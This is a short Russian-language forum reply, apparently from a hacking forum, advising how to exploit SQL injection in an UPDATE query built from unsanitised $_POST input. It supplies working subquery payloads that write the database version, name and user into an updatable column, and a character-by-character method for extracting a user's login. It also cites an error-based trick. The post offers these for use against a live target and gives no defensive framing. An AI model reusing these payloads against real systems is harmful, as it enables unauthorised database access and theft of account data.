ну если он UPDATE то union select не прокатит!
с помощью юнион можно только объединить два SELECT запроса.

по идеи там запрос типа
UPDATE blabla SET bla_par={$_POST['add']} bla..... WHERE bla......
Поюзать ты сможешь если: сможешь потом получится посмотреть то что проапдейтил!

Не плохо было б знать какие еще это запрос изменяет поля.А вообще подзапросы в помощь.

пример

UPDATE blabla SET bla_par=(SELECT version()) WHERE tratata....-- bla..... WHERE bla......
или ты к примеру знаешь что этот же запрос апдейтит текстовое поле name
UPDATE blabla SET bla_par=1, name=(SELECT concat_ws(0x3a,version(),database(),user()) WHERE tratata -- bla..... WHERE bla......
лучше конечно взглянуть бы в сорцы если это возможно что б иметь представление о структуре запроса

извените если сказал бред (=

АПД: или юзай more than 1 rows https://forum.antichat.ru/threadnav35207-1-10.html
АПД2:
UPDATE table SET add=(SELECT ASCII( substring( (SELECT login FROM users WHERE id=1 ),3,1) )) WHERE id=1

вот пример запроса с инъекцией(жирным наш код)
перебираем по одному символы. Это конечно если можно глянуть результат апдейта.